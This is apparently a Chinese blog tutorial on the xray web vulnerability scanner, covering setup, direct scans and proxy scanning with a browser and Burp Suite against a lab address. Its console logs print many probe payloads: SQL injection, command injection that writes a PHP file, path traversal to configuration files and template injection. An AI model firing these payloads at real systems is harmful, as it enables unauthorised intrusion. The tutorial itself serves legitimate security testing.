Xray工具使用（一）

原创已于 2022-04-27 16:09:52 修改 · 3.5k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #安全性测试

于 2022-04-27 15:43:57 首次发布

渗透测试专栏收录该内容

5 篇文章

订阅专栏

本文介绍了xray，一款高效的安全评估工具，具备快速检测、广泛支持、高质量代码和高度可定制化等特点。内容包括xray的下载链接、安装配置步骤，以及详细阐述了如何进行单个地址的Web扫描、利用浏览器代理扫描和与burpsuite配合使用的案例。

xray简介

xray 是一款功能强大的安全评估工具，主要特性有:

检测速度快。发包速度快; 漏洞检测算法高效。
支持范围广。大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。
代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。
高级可定制。通过配置文件暴露了引擎的各种参数，通过修改配置文件可以极大的客制化功能。
安全无威胁。xray 定位为一款安全辅助评估工具，而不是攻击工具，内置的所有 payload 和 poc 均为无害化检查。

xray下载地址：https://github.com/chaitin/xray/releases

xray安全评估工具文档：xray 安全评估工具文档

安装配置

功能参数介绍：

首先生成CA证书，并安装ca.crt，如图所示：

运行并生成config.yaml文件。

使用案例

单个地址实施web扫描

xray_windows_amd64.exe webscan --url http://192.168.72.135:8080 --html-output result.html

C:\xray_windows_amd64.exe>xray_windows_amd64.exe webscan --url http://192.168.72.135:8080 --html-output result.html

____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

Version: 1.8.4/a47961e0/COMMUNITY

[INFO] 2022-04-27 15:09:17 [default:entry.go:213] Loading config file from config.yaml
[WARN] 2022-04-27 15:09:17 [default:webscan.go:222] disable these plugins as that's not an advanced version, [thinkphp fastjson shiro struts]

Enabled plugins: [baseline cmd-injection jsonp xxe phantasm brute-force crlf-injection path-traversal redirect upload sqldet dirscan ssrf xss]

[INFO] 2022-04-27 15:09:17 [phantasm:phantasm.go:180] 358 pocs have been loaded (debug level will show more details)
These plugins will be disabled as reverse server is not configured, check out the reference to fix this error.
Ref: https://docs.xray.cool/#/configration/reverse
Plugins:
        poc-yaml-dlink-cve-2019-16920-rce
        poc-yaml-jenkins-cve-2018-1000600
        poc-yaml-jira-cve-2019-11581
        poc-yaml-jira-ssrf-cve-2019-8451
        poc-yaml-mongo-express-cve-2019-10758
        poc-yaml-pandorafms-cve-2019-20224-rce
        poc-yaml-saltstack-cve-2020-16846
        poc-yaml-solr-cve-2017-12629-xxe
        poc-yaml-supervisord-cve-2017-11610
        poc-yaml-weblogic-cve-2017-10271
        ssrf/ssrf/default
        xxe/xxe/blind


[INFO] 2022-04-27 15:09:17 [default:dispatcher.go:433] processing GET http://192.168.72.135:8080
[Vuln: baseline]
Target           "http://192.168.72.135:8080/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=cadr%25%25fzpi"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5(830805071)))-- X"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52046949917;{/dede:field}"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/oauth/authorize?response_type=${40611*44331}&client_id=acme&scope=openid&redirect_uri=http://test"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=<nil>"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(956603143)+--+@`'`"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/manager/radius/server_ping.php?ip=127.0.0.1|echo%20\"<?php%20echo%20md5(bhnlehbjsh);unlink(__FILE__);?>\">../../bhnlehbjsh.php&id=1"
VulnType         "sensitive/server-error"

忽略。。。。。。。。。。。。。

[ERRO] 2022-04-27 15:09:18 [default:yaml.go:198] context canceled
[ERRO] 2022-04-27 15:09:18 [go-poc:seeyon-htmlofficeservlet-rce.go:66] context canceled
[*] scanned: 0, pending: 1, requestSent: 709, latency: 2.12ms, failedRatio: 23.98%
[INFO] 2022-04-27 15:09:18 [controller:dispatcher.go:562] controller released, task done

webcan相关参数介绍：

xray+浏览器代理扫描案例

xray+浏览器：浏览器设置xray代理，实现浏览器访问的地址被xray扫描。

xray设置监听端口：

浏览器设置代理127.0.0.1:7777，访问URL。

xray自动扫描，如下所示：

C:\xray_windows_amd64.exe>xray_windows_amd64.exe ws --listen 127.0.0.1:7777 --html-output result_new.html

____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

Version: 1.8.4/a47961e0/COMMUNITY

[INFO] 2022-04-27 15:21:16 [default:entry.go:213] Loading config file from config.yaml
[WARN] 2022-04-27 15:21:16 [default:webscan.go:222] disable these plugins as that's not an advanced version, [fastjson shiro struts thinkphp]

Enabled plugins: [crlf-injection upload xss brute-force cmd-injection jsonp xxe sqldet ssrf phantasm baseline dirscan path-traversal redirect]

[INFO] 2022-04-27 15:21:16 [phantasm:phantasm.go:180] 358 pocs have been loaded (debug level will show more details)
These plugins will be disabled as reverse server is not configured, check out the reference to fix this error.
Ref: https://docs.xray.cool/#/configration/reverse
Plugins:
        poc-yaml-dlink-cve-2019-16920-rce
        poc-yaml-jenkins-cve-2018-1000600
        poc-yaml-jira-cve-2019-11581
        poc-yaml-jira-ssrf-cve-2019-8451
        poc-yaml-mongo-express-cve-2019-10758
        poc-yaml-pandorafms-cve-2019-20224-rce
        poc-yaml-saltstack-cve-2020-16846
        poc-yaml-solr-cve-2017-12629-xxe
        poc-yaml-supervisord-cve-2017-11610
        poc-yaml-weblogic-cve-2017-10271
        ssrf/ssrf/default
        xxe/xxe/blind


[INFO] 2022-04-27 15:21:16 [collector:mitm.go:215] loading cert from ./ca.crt and ./ca.key
[INFO] 2022-04-27 15:21:17 [collector:mitm.go:270] starting mitm server at 127.0.0.1:7777
[INFO] 2022-04-27 15:23:03 [default:dispatcher.go:433] processing GET https://sug.so.360.cn/suggest?word=http%3A%2F%2F192.168.72.135%3A8080%2F&callback=suggest360&encodein=utf-8&encodeout=utf-8&format=json
[INFO] 2022-04-27 15:23:04 [default:dispatcher.go:433] processing GET http://192.168.72.135:8080/
[Vuln: baseline]
Target           "http://192.168.72.135:8080/include/thumb.php?dir=http\\..\\admin\\login\\login_check.php"
VulnType         "sensitive/server-error"

[*] scanned: 0, pending: 2, requestSent: 454, latency: 77.58ms, failedRatio: 0.00%
[Vuln: baseline]
Target           "http://192.168.72.135:8080/type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa\") and extractvalue(1,concat(0x7e,md5(99999999))) -- a"
VulnType         "sensitive/server-error"

[*] scanned: 0, pending: 2, requestSent: 995, latency: 71.68ms, failedRatio: 0.00%
[Vuln: baseline]
Target           "http://192.168.72.135:8080/include/makecvs.php?Event=http|echo%20\"<?php%20echo%20md5(fvykoshcnl);unlink(__FILE__);?>\"%20>>%20/usr/www/fvykoshcnl.php%20&&%20chmod%20755%20/usr/www/fvykoshcnl.php||"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=yjet%25%25vpms"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(981009000)+--+@`'`"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/manager/radius/server_ping.php?ip=127.0.0.1|echo%20\"<?php%20echo%20md5(iowesdrcxu);unlink(__FILE__);?>\">../../iowesdrcxu.php&id=1"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(208261576),0x7e),1)--+"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5(200188526)%29,4,5,6,7,8,9,10,11,12%23_"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/f/job.php?job=getzone&typeid=zone&fup=..\\..\\do\\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(208912940),9,10,11,12,13,14,15,16,17,18,19%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(209998525),5,6,7,8,9%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=<nil>"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/get_luser_by_sshport.php?clientip=1;echo%20\"<?php%20echo%20md5(jgcuboeaqe);unlink(__FILE__);?>\">/opt/freesvr/web/htdocs/freesvr/audit/jgcuboeaqe.php;&clientport=1"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/actions/seomatic/meta-container/meta-link-container/?uri={{43203*'41244'}}"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/actions/seomatic/meta-container/all-meta-containers?uri={{43203*'41244'}}"
VulnType         "sensitive/server-error"

[Vuln: dirscan]
Target           "http://192.168.72.135:8080/examples/"
VulnType         "debug/default"
Payload          "/examples/"

忽略。。。。。

[WARN] 2022-04-27 15:23:16 [default:ctx.go:34] receive signal: interrupt
[*] scanned: 1, pending: 1, requestSent: 1942, latency: 67.60ms, failedRatio: 0.00%
[INFO] 2022-04-27 15:23:17 [collector:mitm.go:294] mitm server stopped
[INFO] 2022-04-27 15:23:17 [controller:dispatcher.go:562] controller released, task done

burpsuite+xray扫描配置

burpsuite+xray结合实现地址扫描。

监听7777端口（如上），burpsuite设置

浏览器设置burpsuite代理，浏览器访问URL即可实现xray自动扫描

C:\xray_windows_amd64.exe>xray_windows_amd64.exe ws --listen 127.0.0.1:7777 --html-output result_2.html

____  ___.________.    ____.   _____.___.
\   \/  /\_   __   \  /  _  \  \__  |   |
 \     /  |    _  _/ /  /_\  \  /   |   |
 /     \  |    |   \/    |    \ \____   |
\___/\  \ |____|   /\____|_   / / _____/
      \_/       \_/        \_/  \/

Version: 1.8.4/a47961e0/COMMUNITY

[INFO] 2022-04-27 15:33:56 [default:entry.go:213] Loading config file from config.yaml
[WARN] 2022-04-27 15:33:56 [default:webscan.go:222] disable these plugins as that's not an advanced version, [fastjson struts thinkphp shiro]

Enabled plugins: [baseline redirect upload phantasm jsonp sqldet brute-force cmd-injection crlf-injection path-traversal ssrf xss dirscan xxe]

[INFO] 2022-04-27 15:33:56 [phantasm:phantasm.go:180] 358 pocs have been loaded (debug level will show more details)
These plugins will be disabled as reverse server is not configured, check out the reference to fix this error.
Ref: https://docs.xray.cool/#/configration/reverse
Plugins:
        poc-yaml-dlink-cve-2019-16920-rce
        poc-yaml-jenkins-cve-2018-1000600
        poc-yaml-jira-cve-2019-11581
        poc-yaml-jira-ssrf-cve-2019-8451
        poc-yaml-mongo-express-cve-2019-10758
        poc-yaml-pandorafms-cve-2019-20224-rce
        poc-yaml-saltstack-cve-2020-16846
        poc-yaml-solr-cve-2017-12629-xxe
        poc-yaml-supervisord-cve-2017-11610
        poc-yaml-weblogic-cve-2017-10271
        ssrf/ssrf/default
        xxe/xxe/blind


[INFO] 2022-04-27 15:33:56 [collector:mitm.go:215] loading cert from ./ca.crt and ./ca.key
[INFO] 2022-04-27 15:33:56 [collector:mitm.go:270] starting mitm server at 127.0.0.1:7777
[*] scanned: 0, pending: 1, requestSent: 1, latency: 0.00ms, failedRatio: 0.00%
[INFO] 2022-04-27 15:35:01 [default:dispatcher.go:433] processing GET http://192.168.72.135:8080/
[Vuln: baseline]
Target           "http://192.168.72.135:8080/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52070712504;{/dede:field}"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/f/job.php?job=getzone&typeid=zone&fup=..\\..\\do\\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(207410695),9,10,11,12,13,14,15,16,17,18,19%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/get_luser_by_sshport.php?clientip=1;echo%20\"<?php%20echo%20md5(iwbkptecqh);unlink(__FILE__);?>\">/opt/freesvr/web/htdocs/freesvr/audit/iwbkptecqh.php;&clientport=1"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/include/makecvs.php?Event=http|echo%20\"<?php%20echo%20md5(ycsbixadpz);unlink(__FILE__);?>\"%20>>%20/usr/www/ycsbixadpz.php%20&&%20chmod%20755%20/usr/www/ycsbixadpz.php||"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/oauth/authorize?response_type=${41399*41187}&client_id=acme&scope=openid&redirect_uri=http://test"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=dgqu%25%25addg"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5(834967583))) desc --+a"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(205122676),5,6,7,8,9%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5(978660149))) --+"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(912682181)+--+@`'`"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
VulnType         "sensitive/server-error"

[Vuln: baseline]
Target           "http://192.168.72.135:8080/manager/radius/server_ping.php?ip=127.0.0.1|echo%20\"<?php%20echo%20md5(mqktmeoxoi);unlink(__FILE__);?>\">../../mqktmeoxoi.php&id=1"
VulnType         "sensitive/server-error"

[WARN] 2022-04-27 15:35:09 [default:ctx.go:34] receive signal: interrupt
[ERRO] 2022-04-27 15:35:09 [default:yaml.go:198] context canceled
[ERRO] 2022-04-27 15:35:09 [default:yaml.go:198] context canceled
[Vuln: baseline]
Target           "http://192.168.72.135:8080/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(202091685),0x7e),1)--+"
VulnType         "sensitive/server-error"

忽略部分内容。。。。。。。。。

[ERRO] 2022-04-27 15:35:09 [go-poc:tomcat-put.go:60] context canceled
[ERRO] 2022-04-27 15:35:09 [default:yaml.go:198] context canceled
[ERRO] 2022-04-27 15:35:09 [default:yaml.go:198] context canceled
[*] scanned: 0, pending: 1, requestSent: 674, latency: 1.93ms, failedRatio: 3.26%
[ERRO] 2022-04-27 15:35:09 [go-poc:ecology-dbconfig-info-leak.go:45] context canceled
[ERRO] 2022-04-27 15:35:09 [go-poc:seeyon-htmlofficeservlet-rce.go:66] context canceled
[ERRO] 2022-04-27 15:35:09 [go-poc:tongda-arbitrarily-auth.go:49] context canceled
[INFO] 2022-04-27 15:35:10 [controller:dispatcher.go:562] controller released, task done

后续继续分享其他。